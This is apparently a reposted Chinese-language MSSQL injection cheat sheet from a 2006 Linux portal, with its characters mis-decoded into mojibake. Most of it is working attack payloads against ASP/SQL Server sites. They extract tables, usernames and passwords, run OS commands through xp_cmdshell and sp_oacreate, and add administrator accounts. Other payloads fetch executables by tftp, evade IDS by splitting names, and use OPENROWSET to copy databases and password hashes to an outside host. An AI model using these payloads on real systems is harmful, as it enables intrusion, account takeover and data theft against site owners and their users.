ºìÁªLinuxÃÅ»§
Linux°ïÖú

Mssql¸ß¼¶×¢Èë±Ê¼Ç

·¢²¼Ê±¼ä:2006-09-29 21:30:20À´Ô´:ºìÁª×÷Õß:asiaec
Sql×¢Éä×ܽᣨÔçÔ´ÓÚ¡¯or¡¯1¡¯=¡¯1£©

×îÖØÒªµÄ±íÃû£º
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

×îÖØÒªµÄһЩÓû§Ãû£¨Ä¬ÈÏsqlÊý¾Ý¿âÖдæÔÚ×ŵģ©
public
dbo
guest(Ò»°ã½ûÖ¹£¬»òÕßûȨÏÞ)
db_sercurityadmin
ab_dlladmin

һЩĬÈÏÀ©Õ¹

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia Çý¶¯Æ÷Ïà¹Ø
xp_dirtree Ŀ¼
xp_enumdsn ODBCÁ¬½Ó
xp_loginconfig ·þÎñÆ÷°²È«Ä£Ê½ÐÅÏ¢
xp_makecab ´´½¨Ñ¹Ëõ¾í
xp_ntsec_enumdomains domainÐÅÏ¢
xp_terminate_process Öն˽ø³Ì£¬¸ø³öÒ»¸öPID

ÀýÈ磺
sp_addextendedproc ¡¯xp_webserver¡¯, ¡¯c:/temp/xp_foo.dll¡¯
exec xp_webserver
sp_dropextendedproc ¡¯xp_webserver¡¯
bcp "select * FROM test..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar
¡¯ group by users.id having 1=1-
¡¯ group by users.id, users.username, users.password, users.privs having 1=1-
¡¯; insert into users values( 666, ¡¯attacker¡¯, ¡¯foobar¡¯, 0xffff )-

union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=¡¯logintable¡¯-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=¡¯logintable¡¯ where COLUMN_NAME NOT IN (¡¯login_id¡¯)-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=¡¯logintable¡¯ where COLUMN_NAME NOT IN (¡¯login_id¡¯,¡¯login_name¡¯)-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name=¡¯Rahul¡¯--
¹¹ÔìÓï¾ä£º²éѯÊÇ·ñ´æÔÚxp_cmdshell
¡¯ union select @@version,1,1,1--
and 1=(select @@VERSION)
and ¡¯sa¡¯=(select System_user)
¡¯ union select ret,1,1,1 from foo--
¡¯ union select min(username),1,1,1 from users where username > ¡¯a¡¯-
¡¯ union select min(username),1,1,1 from users where username > ¡¯admin¡¯-
¡¯ union select password,1,1,1 from users where username = ¡¯admin¡¯--
and user_name()=¡¯dbo¡¯
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate ¡¯wscript.shell¡¯,@shell OUTPUT EXEC SP_OAMETHOD @shell,¡¯run¡¯,null, ¡¯C£º/WINNT/system32/cmd.exe /c net user swap 5245886 /add¡¯
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = ¡¯X¡¯ AND name = ¡¯xp_cmdshell¡¯)
;EXEC master.dbo.sp_addextendedproc ¡¯xp_cmdshell¡¯, ¡¯xplog70.dll¡¯

1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=¡¯x¡¯%20and%20name=¡¯xp_cmdshell¡¯)
and 1=(select IS_SRVROLEMEMBER(¡¯sysadmin¡¯)) ÅжÏsaȨÏÞÊÇ·ñ
and 0<>(select top 1 paths from newtable)-- ±©¿â´ó·¨
and 1=(select name from master.dbo.sysdatabases where dbid=7) µÃµ½¿âÃû£¨´Ó1µ½5¶¼ÊÇϵͳµÄid£¬6ÒÔÉϲſÉÒÔÅжϣ©
´´½¨Ò»¸öÐéÄâĿ¼EÅÌ£º
declare @o int exec sp_oacreate ¡¯wscript.shell¡¯, @o out exec sp_oamethod @o, ¡¯run¡¯, NULL,¡¯ cscript.exe c£º/inetpub/wwwroot/mkwebdir.vbs -w "ĬÈÏ Web Õ¾µã" -v "e","e£º/"¡¯
·ÃÎÊÊôÐÔ£º£¨ÅäºÏдÈëÒ»¸öwebshell£©
declare @o int exec sp_oacreate ¡¯wscript.shell¡¯, @o out exec sp_oamethod @o, ¡¯run¡¯, NULL,¡¯ cscript.exe c£º/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse¡¯

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
ÒÀ´ÎÌá½» dbid = 7,8,9.... µÃµ½¸ü¶àµÄÊý¾Ý¿âÃû
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=¡¯U¡¯) ±©µ½Ò»¸ö±í ¼ÙÉèΪ admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=¡¯U¡¯ and name not in (¡¯Admin¡¯)) À´µÃµ½ÆäËûµÄ±í¡£
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=¡¯U¡¯ and name=¡¯admin¡¯
and uid>(str(id))) ±©µ½UIDµÄÊýÖµ¼ÙÉèΪ18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) µÃµ½Ò»¸öadminµÄÒ»¸ö×Ö¶Î,¼ÙÉèΪ user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(¡¯id¡¯,...)) À´±©³öÆäËûµÄ×Ö¶Î
and 0<(select user_id from BBS.dbo.admin where username>1) ¿ÉÒԵõ½Óû§Ãû
ÒÀ´Î¿ÉÒԵõ½ÃÜÂë¡£¡£¡£¡£¡£¼ÙÉè´æÔÚuser_id username ,password µÈ×Ö¶Î

Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(unionÓï¾äµ½´¦·çÃÒ°¡£¬accessÒ²ºÃÓÃ

±©¿âÌØÊâ¼¼ÇÉ£º:%5c=¡¯/¡¯ »òÕß°Ñ/ºÍ/ ÐÞ¸Ä%5Ìá½»
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=¡¯U¡¯) µÃµ½±íÃû
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=¡¯U¡¯ and name not in(¡¯Address¡¯))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=¡¯U¡¯ and name=¡¯admin¡¯ and uid>(str(id))) ÅжÏidÖµ
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) ËùÓÐ×Ö¶Î

http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=¡¯HKEY_LOCAL_MACHINE¡¯, @key=¡¯SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/¡¯, @value_name=¡¯/¡¯, values=@test OUTPUT insert into paths(path) values(@test)

http://61.131.96.39/PageShow.asp?TianName=Õþ²ß·¨¹æ&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--

µÃµ½ÁËweb·¾¶d:/xxxx,½ÓÏÂÀ´£º
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--

´«Í³µÄ´æÔÚxp_cmdshellµÄ²âÊÔ¹ý³Ì£º
;exec master..xp_cmdshell ¡¯dir¡¯
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell ¡¯net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add¡¯;--
;exec master.dbo.xp_cmdshell ¡¯net localgroup administrators hax /add¡¯;--
exec master..xp_servicecontrol ¡¯start¡¯, ¡¯schedule¡¯
exec master..xp_servicecontrol ¡¯start¡¯, ¡¯server¡¯
http£º//www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate ¡¯wscript.shell¡¯,@shell OUTPUT EXEC SP_OAMETHOD @shell,¡¯run¡¯,null, ¡¯C£º/WINNT/system32/cmd.exe /c net user swap 5258 /add¡¯
;DECLARE @shell INT EXEC SP_OAcreate ¡¯wscript.shell¡¯,@shell OUTPUT EXEC SP_OAMETHOD @shell,¡¯run¡¯,null, ¡¯C£º/WINNT/system32/cmd.exe /c net localgroup administrators swap/add¡¯

http://localhost/show.asp?id=1'; exec master..xp_cmdshell ¡¯tftp -i youip get file.exe¡¯-

declare @a sysname set @a=¡¯xp_¡¯+¡¯cmdshell¡¯ exec @a ¡¯dir c:/¡¯
declare @a sysname set @a=¡¯xp¡¯+¡¯_cm¡¯+¡¯dshell¡¯ exec @a ¡¯dir c:/¡¯
;declare @a;set @a=db_name();backup database @a to disk=¡¯ÄãµÄIPÄãµÄ¹²ÏíĿ¼bak.dat¡¯
Èç¹û±»ÏÞÖÆÔò¿ÉÒÔ¡£
select * from openrowset(¡¯sqloledb¡¯,¡¯server¡¯;¡¯sa¡¯;¡¯¡¯,¡¯select ¡¯¡¯OK!¡¯¡¯ exec master.dbo.sp_addlogin hax¡¯)
´«Í³²éѯ¹¹Ô죺
select * FROM news where id=... AND topic=... AND .....
admin¡¯and 1=(select count(*) from [user] where username=¡¯victim¡¯ and right(left(userpass,01),1)=¡¯1¡¯) and userpass <>¡¯
select 123;--
;use master;--
:a¡¯ or name like ¡¯fff%¡¯;-- ÏÔʾÓÐÒ»¸ö½ÐffffµÄÓû§¹þ¡£
¡¯and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=¡¯u¡¯ and status>0) where name=¡¯ffff¡¯;--
˵Ã÷:
ÉÏÃæµÄÓï¾äÊǵõ½Êý¾Ý¿âÖеĵÚÒ»¸öÓû§±í,²¢°Ñ±íÃû·ÅÔÚffffÓû§µÄÓÊÏä×Ö¶ÎÖС£
ͨ¹ý²é¿´ffffµÄÓû§×ÊÁϿɵõÚÒ»¸öÓñí½Ðad
È»ºó¸ù¾Ý±íÃûadµÃµ½Õâ¸ö±íµÄID
ffff¡¯;update [users] set email=(select top 1 id from sysobjects where xtype=¡¯u¡¯ and name=¡¯ad¡¯) where name=¡¯ffff¡¯;--

ÏóÏÂÃæÕâÑù¾Í¿ÉÒԵõ½µÚ¶þ¸ö±íµÄÃû×ÖÁË
ffff¡¯;update [users] set email=(select top 1 name from sysobjects where xtype=¡¯u¡¯ and id>581577110) where name=¡¯ffff¡¯;--
ffff¡¯;update [users] set email=(select top 1 count(id) from password) where name=¡¯ffff¡¯;--
ffff¡¯;update [users] set email=(select top 1 pwd from password where id=2) where name=¡¯ffff¡¯;--

ffff¡¯;update [users] set email=(select top 1 name from password where id=2) where name=¡¯ffff¡¯;--

exec master..xp_servicecontrol ¡¯start¡¯, ¡¯schedule¡¯
exec master..xp_servicecontrol ¡¯start¡¯, ¡¯server¡¯
sp_addextendedproc ¡¯xp_webserver¡¯, ¡¯c:/temp/xp_foo.dll¡¯
À©Õ¹´æ´¢¾Í¿ÉÒÔͨ¹ýÒ»°ãµÄ·½·¨µ÷Óãº
exec xp_webserver
Ò»µ©Õâ¸öÀ©Õ¹´æ´¢Ö´Ðйý£¬¿ÉÒÔÕâÑùɾ³ýËü:
sp_dropextendedproc ¡¯xp_webserver¡¯

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-

insert into users values( 667,123,123,0xffff)-

insert into users values ( 123, ¡¯admin¡¯¡¯--¡¯, ¡¯password¡¯, 0xffff)-

;and user>0
;;and (select count(*) from sysobjects)>0
;;and (select count(*) from mysysobjects)>0 //ΪaccessÊý¾Ý¿â

-----------------------------------------------------------ͨ³£×¢ÉäµÄһЩ½éÉÜ£º
A) ID=49 ÕâÀà×¢ÈëµÄ²ÎÊýÊÇÊý×ÖÐÍ£¬SQLÓï¾äԭò´óÖÂÈçÏ£º
select * from ±íÃû where ×Ö¶Î=49
×¢ÈëµÄ²ÎÊýΪID=49 And [²éѯÌõ¼þ]£¬¼´ÊÇÉú³ÉÓï¾ä£º
select * from ±íÃû where ×Ö¶Î=49 And [²éѯÌõ¼þ]

(B) Class=Á¬Ðø¾ç ÕâÀà×¢ÈëµÄ²ÎÊýÊÇ×Ö·ûÐÍ£¬SQLÓï¾äԭò´óÖ¸ÅÈçÏ£º
select * from ±íÃû where ×Ö¶Î=¡¯Á¬Ðø¾ç¡¯
×¢ÈëµÄ²ÎÊýΪClass=Á¬Ðø¾ç¡¯ and [²éѯÌõ¼þ] and ¡¯¡¯=¡¯ £¬¼´ÊÇÉú³ÉÓï¾ä£º
select * from ±íÃû where ×Ö¶Î=¡¯Á¬Ðø¾ç¡¯ and [²éѯÌõ¼þ] and ¡¯¡¯=¡¯¡¯
(C) ËÑË÷ʱû¹ýÂ˲ÎÊýµÄ£¬Èçkeyword=¹Ø¼ü×Ö£¬SQLÓï¾äԭò´óÖÂÈçÏ£º
select * from ±íÃû where ×Ö¶Îlike ¡¯%¹Ø¼ü×Ö%¡¯
×¢ÈëµÄ²ÎÊýΪkeyword=¡¯ and [²éѯÌõ¼þ] and ¡¯%25¡¯=¡¯£¬ ¼´ÊÇÉú³ÉÓï¾ä£º
select * from ±íÃû where×Ö¶Îlike ¡¯%¡¯ and [²éѯÌõ¼þ] and ¡¯%¡¯=¡¯%¡¯
;;and (select Top 1 name from sysobjects where xtype=¡¯U¡¯ and status>0)>0
sysobjectsÊÇSQLServerµÄϵͳ±í£¬´æ´¢×ÅËùÓеıíÃû¡¢ÊÓͼ¡¢Ô¼Êø¼°ÆäËü¶ÔÏó£¬xtype=¡¯U¡¯ and status>0£¬±íʾÓû§½¨Á¢µÄ±íÃû£¬ÉÏÃæµÄÓï¾ä½«µÚÒ»¸ö±íÃûÈ¡³ö£¬Óë0±È½Ï´óС£¬Èñ¨´íÐÅÏ¢°Ñ±íÃû±©Â¶³öÀ´¡£
;;and (select Top 1 col_name(object_id(¡¯±íÃû¡¯),1) from sysobjects)>0
´Ó¢ÝÄõ½±íÃûºó£¬ÓÃobject_id(¡¯±íÃû¡¯)»ñÈ¡±íÃû¶ÔÓ¦µÄÄÚ²¿ID£¬col_name(±íÃûID,1)´ú±í¸Ã±íµÄµÚ1¸ö×Ö¶ÎÃû£¬½«1»»³É2,3,4...¾Í¿ÉÒÔÖð¸ö»ñÈ¡Ëù²Â½â±íÀïÃæµÄ×Ö¶ÎÃû¡£

post.htmÄÚÈÝ£ºÖ÷ÒªÊÇ·½±ãÊäÈë¡£








ö¾Ù³öËûµÄÊý¾Ý±íÃû£º
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=¡¯u¡¯ and status>0);--
ÕâÊǽ«µÚÒ»¸ö±íÃû¸üе½aaaµÄ×ֶδ¦¡£
¶Á³öµÚÒ»¸ö±í£¬µÚ¶þ¸ö±í¿ÉÒÔÕâÑù¶Á³öÀ´£¨ÔÚÌõ¼þºó¼ÓÉÏ and name<>¡¯¸Õ²ÅµÃµ½µÄ±íÃû¡¯£©¡£
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=¡¯u¡¯ and status>0 and name<>¡¯vote¡¯);--
È»ºóid=1552 and exists(select * from aaa where aaa>5)
¶Á³öµÚ¶þ¸ö±í£¬^^^^^^Ò»¸ö¸öµÄ¶Á³ö£¬Ö±µ½Ã»ÓÐΪֹ¡£
¶Á×Ö¶ÎÊÇÕâÑù£º
id=1552;update aaa set aaa=(select top 1 col_name(object_id(¡¯±íÃû¡¯),1));--
È»ºóid=1552 and exists(select * from aaa where aaa>5)³ö´í£¬µÃµ½×Ö¶ÎÃû
id=1552;update aaa set aaa=(select top 1 col_name(object_id(¡¯±íÃû¡¯),2));--
È»ºóid=1552 and exists(select * from aaa where aaa>5)³ö´í£¬µÃµ½×Ö¶ÎÃû
--------------------------------¸ß¼¶¼¼ÇÉ£º
[»ñµÃÊý¾Ý±íÃû][½«×Ö¶ÎÖµ¸üÐÂΪ±íÃû£¬ÔÙÏë·¨¶Á³öÕâ¸ö×ֶεÄÖµ¾Í¿ÉµÃµ½±íÃû]
update ±íÃû set ×Ö¶Î=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>¡¯ÄãµÃµ½µÄ±íÃû¡¯ ²é³öÒ»¸ö¼ÓÒ»¸ö]) [ where Ìõ¼þ]
select top 1 name from sysobjects where xtype=u and status>0 and name not in(¡¯table1¡¯,¡¯table2¡¯,¡­)
ͨ¹ýSQLSERVER×¢È멶´½¨Êý¾Ý¿â¹ÜÀíÔ±ÕʺźÍϵͳ¹ÜÀíÔ±ÕʺÅ[µ±Ç°ÕʺűØÐëÊÇSYSADMIN×é]

[»ñµÃÊý¾Ý±í×Ö¶ÎÃû][½«×Ö¶ÎÖµ¸üÐÂΪ×Ö¶ÎÃû£¬ÔÙÏë·¨¶Á³öÕâ¸ö×ֶεÄÖµ¾Í¿ÉµÃµ½×Ö¶ÎÃû]
update ±íÃû set ×Ö¶Î=(select top 1 col_name(object_id(¡¯Òª²éѯµÄÊý¾Ý±íÃû¡¯),×Ö¶ÎÁÐÈç:1) [ where Ìõ¼þ]

ÈƹýIDSµÄ¼ì²â[ʹÓñäÁ¿]
declare @a sysname set @a=¡¯xp_¡¯+¡¯cmdshell¡¯ exec @a ¡¯dir c:/¡¯
declare @a sysname set @a=¡¯xp¡¯+¡¯_cm¡¯+¡¯dshell¡¯ exec @a ¡¯dir c:/¡¯

1¡¢ ¿ªÆôÔ¶³ÌÊý¾Ý¿â
»ù±¾Óï·¨
select * from OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯server=servername;uid=sa;pwd=apachy_123¡¯, ¡¯select * from table1¡¯ )
²ÎÊý: (1) OLEDB Provider name
2¡¢ ÆäÖÐÁ¬½Ó×Ö·û´®²ÎÊý¿ÉÒÔÊÇÈκκͶ˿ÚÓÃÀ´Á¬½Ó,±ÈÈç
select * from OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;¡¯, ¡¯select * from table¡¯

Òª¸´ÖÆÄ¿±êÖ÷»úµÄÕû¸öÊý¾Ý¿â£¬Ê×ÏÈÒªÔÚÄ¿±êÖ÷»úÉϺÍ×Ô¼º»úÆ÷ÉϵÄÊý¾Ý¿â½¨Á¢Á¬½Ó(ÈçºÎÔÚÄ¿±êÖ÷»úÉϽ¨Á¢Ô¶³ÌÁ¬½Ó£¬¸Õ²ÅÒѾ­½²ÁË),Ö®ºóinsertËùÓÐÔ¶³Ì±íµ½±¾µØ±í¡£

»ù±¾Óï·¨£º
insert into OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯server=servername;uid=sa;pwd=apachy_123¡¯, ¡¯select * from table1¡¯) select * from table2
ÕâÐÐÓï¾ä½«Ä¿±êÖ÷»úÉÏtable2±íÖеÄËùÓÐÊý¾Ý¸´ÖƵ½Ô¶³ÌÊý¾Ý¿âÖеÄtable1±íÖС£Êµ¼ÊÔËÓÃÖÐÊʵ±ÐÞ¸ÄÁ¬½Ó×Ö·û´®µÄIPµØÖ·ºÍ¶Ë¿Ú£¬Ö¸ÏòÐèÒªµÄµØ·½£¬±ÈÈ磺
insert into OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;¡¯, ¡¯select * from table1¡¯) select * from table2

insert into OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;¡¯, ¡¯select * from _sysdatabases¡¯)
select * from master.dbo.sysdatabases

insert into OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;¡¯, ¡¯select * from _sysobjects¡¯)
select * from user_database.dbo.sysobjects

insert into OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;¡¯, ¡¯select * from _syscolumns¡¯)
select * from user_database.dbo.syscolumns

Ö®ºó£¬±ã¿ÉÒÔ´Ó±¾µØÊý¾Ý¿âÖп´µ½Ä¿±êÖ÷»úµÄ¿â½á¹¹£¬ÕâÒѾ­Ò×Èç·´ÕÆ£¬²»¶à½²£¬¸´ÖÆÊý¾Ý¿â£º
insert into OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;¡¯, ¡¯select * from table1¡¯) select * from database..table1

insert into OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;¡¯, ¡¯select * from table2¡¯) select * from database..table2

......

3¡¢ ¸´ÖƹþÎ÷±í£¨HASH£©

Õâʵ¼ÊÉÏÊÇÉÏÊö¸´ÖÆÊý¾Ý¿âµÄÒ»¸öÀ©Õ¹Ó¦ÓᣵǼÃÜÂëµÄhash´æ´¢ÓÚsysxloginsÖС£·½·¨ÈçÏ£º
insert into OPENROWSET(¡¯SQLOLEDB¡¯, ¡¯uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;¡¯, ¡¯select * from _sysxlogins¡¯) select * from database.dbo.sysxlogins
µÃµ½hashÖ®ºó£¬¾Í¿ÉÒÔ½øÐб©Á¦Æƽ⡣ÕâÐèÒªÒ»µãÔËÆøºÍ´óÁ¿Ê±¼ä¡£

±éÀúĿ¼µÄ·½·¨£º
ÏÈ´´½¨Ò»¸öÁÙʱ±í£ºtemp
5¡¯;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5¡¯;insert temp exec master.dbo.xp_availablemedia;-- »ñµÃµ±Ç°ËùÓÐÇý¶¯Æ÷
5¡¯;insert into temp(id) exec master.dbo.xp_subdirs ¡¯c:/¡¯;-- »ñµÃ×ÓĿ¼Áбí
5¡¯;insert into temp(id,num1) exec master.dbo.xp_dirtree ¡¯c:/¡¯;-- »ñµÃËùÓÐ×ÓĿ¼µÄĿ¼Ê÷½á¹¹,²¢´çÈëtemp±íÖÐ

5¡¯;insert into temp(id) exec master.dbo.xp_cmdshell ¡¯type c:/web/index.asp¡¯;-- ²é¿´Ä³¸öÎļþµÄÄÚÈÝ
5¡¯;insert into temp(id) exec master.dbo.xp_cmdshell ¡¯dir c:/¡¯;--
5¡¯;insert into temp(id) exec master.dbo.xp_cmdshell ¡¯dir c:/ *.asp /s/a¡¯;--
5¡¯;insert into temp(id) exec master.dbo.xp_cmdshell ¡¯cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc¡¯

5¡¯;insert into temp(id,num1) exec master.dbo.xp_dirtree ¡¯c:/¡¯;-- £¨xp_dirtreeÊÊÓÃȨÏÞPUBLIC£©
дÈë±í£º
Óï¾ä1£ºhttp://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡1=(select IS_SRVROLEMEMBER(¡¯sysadmin¡¯));--
Óï¾ä2£ºhttp://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡1=(select IS_SRVROLEMEMBER(¡¯serveradmin¡¯));--
Óï¾ä3£ºhttp://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡1=(select IS_SRVROLEMEMBER(¡¯setupadmin¡¯));--
Óï¾ä4£ºhttp://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡1=(select IS_SRVROLEMEMBER(¡¯securityadmin¡¯));--
Óï¾ä5£ºhttp://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡1=(select IS_SRVROLEMEMBER(¡¯securityadmin¡¯));--
Óï¾ä6£ºhttp://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡1=(select IS_SRVROLEMEMBER(¡¯diskadmin¡¯));--
Óï¾ä7£ºhttp://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡1=(select IS_SRVROLEMEMBER(¡¯bulkadmin¡¯));--
Óï¾ä8£ºhttp://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡1=(select IS_SRVROLEMEMBER(¡¯bulkadmin¡¯));--
Óï¾ä9£ºhttp://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡1=(select IS_MEMBER(¡¯db_owner¡¯));--
°Ñ·¾¶Ð´µ½±íÖÐÈ¥£º
http://www.xxxxx.com/down/list.asp?id=1;create¡¡table¡¡dirs(paths varchar(100), id int)-
http://http://www.xxxxx.com/down/list.asp?id=1;insert ¡¡dirs¡¡exec¡¡master.dbo.xp_dirtree ¡¯c:/¡¯-
http://http://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡0<>(select¡¡top¡¡1¡¡paths¡¡from¡¡dirs)-
http://http://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡0<>(select¡¡top¡¡1¡¡paths¡¡from¡¡dirs¡¡where¡¡paths¡¡not¡¡in(¡¯@Inetpub¡¯))-
Óï¾ä£ºhttp://http://www.xxxxx.com/down/list.asp?id=1;create¡¡table¡¡dirs1(paths¡¡varchar(100),¡¡id¡¡int)--
Óï¾ä£ºhttp://http://www.xxxxx.com/down/list.asp?id=1;insert¡¡dirs¡¡exec¡¡master.dbo.xp_dirtree ¡¯e:/web¡¯--
Óï¾ä£ºhttp://http://www.xxxxx.com/down/list.asp?id=1¡¡and¡¡0<>(select¡¡top¡¡1¡¡paths¡¡from¡¡dirs1)-
°ÑÊý¾Ý¿â±¸·Ýµ½ÍøҳĿ¼£ºÏÂÔØ
http://http://www.xxxxx.com/down/list.asp?id=1;declare¡¡@a¡¡sysname;¡¡set¡¡@a=db_name();backup¡¡database¡¡@a¡¡to¡¡disk=¡¯e:/web/down.bak¡¯;--

and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
and%201=(select%20Top%201%20col_name(object_id(¡¯USER_LOGIN¡¯),1)%20from%20sysobjects) ²Î¿´Ïà¹Ø±í¡£
and 1=(select%20user_id%20from%20USER_LOGIN)
and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)

Èç¹û¿ÉÒÔͨ¹ýÁ¬½Ó·û×¢Ê͵ôºóÃæµÄÑéÖ¤£¬ÄÇô¾Í¸üÓÐÒâ˼ÁË£¬À´¿´ÎÒÃÇÄÜ×÷ʲô£º
a¡¢ÔÚÓû§ÃûλÖÃÊäÈ롾admin¡¯;exec master.dbo.sp_addlogin Cool;--¡¿£¬Ìí¼ÓÒ»¸ösqlÓû§
b¡¢ÔÚÓû§ÃûλÖÃÊäÈ롾admin¡¯;exec master.dbo.sp_password null,123456,Cool;--¡¿£¬¸øCoolÉèÖÃÃÜÂëΪ123456
c¡¢ÔÚÓû§ÃûλÖÃÊäÈ롾admin¡¯;exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--¡¿£¬¸øCool¸³ÓèSystem AdministratorȨÏÞ

һЩsqlÀ©Õ¹
xp_regaddmultistring
xp_regdeletekey ɾ³ý¼üÃû
xp_regdeletevalue ɾ³ý¼üÖµ
xp_regenumkeys ö¾Ù
xp_regenumvalues
xp_regread ¶ÔÓÚ
xp_regremovemultistring
xp_regwrite д
xp_availablemedia ²é¿´Çý¶¯Æ÷
xp_dirtree ¿´Ä¿Â¼
xp_enumdsn ODBCÊý¾ÝÔ´
xp_loginconfig һЩ·þÎñÆ÷°²È«ÅäÖõÄÐÅÏ¢
xp_makecab ´ò°ü£¬Ä³Ð©dboȨÏÞÏÈ¿É×ö´óÓÃ
xp_ntsec_enumdomains ö¾ÙÓòÃûÏà¹ØÐÅÏ¢
xp_terminate_process Öն˽ø³ÌºÍipÀ²
xp_logininfo µ±Ç°µÇ¼ÕʺÅ
sp_configure ¼ìË÷Êý¾Ý¿âÖеÄÄÚÈÝ£¨ÎÒ¾õµÃÕâ¸öͦÓÐÓõģ©
sp_helpextendedproc µÃµ½ËùÓеĴ洢À©Õ¹
sp_who2 ²éѯÓû§£¬ËûÃǵǼµÄÖ÷»ú£¬ËûÃÇÔÚÊý¾Ý¿âÖÐÖ´ÐеIJÙ×÷µÈµÈ

һЩÍøÂçÐÅÏ¢
exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM/CurrentControlSet/Services/lanmanserver/parameters',
'nullsessionshares'
SNMP¸¨ÖúÍøÂç²Èµã
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
'SYSTEM/CurrentControlSet/Services/snmp/parameters/validcomm
unities'

¿ªÊ¼Ò»Ð©ÏµÍ³·þÎñ,±ÈÈçtelnet£¬Ç°ÌáÏ£Íû¿ÉÒÔÅÜÀ´admin»òÕßһЩϵͳÃÜÂë
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'

Sp_addextendedproc 'xp_webserver','c:/temp/xp_foo.dll' ´ËÀ©Õ¹¿ÉÒÔÔËÐгÌÐò

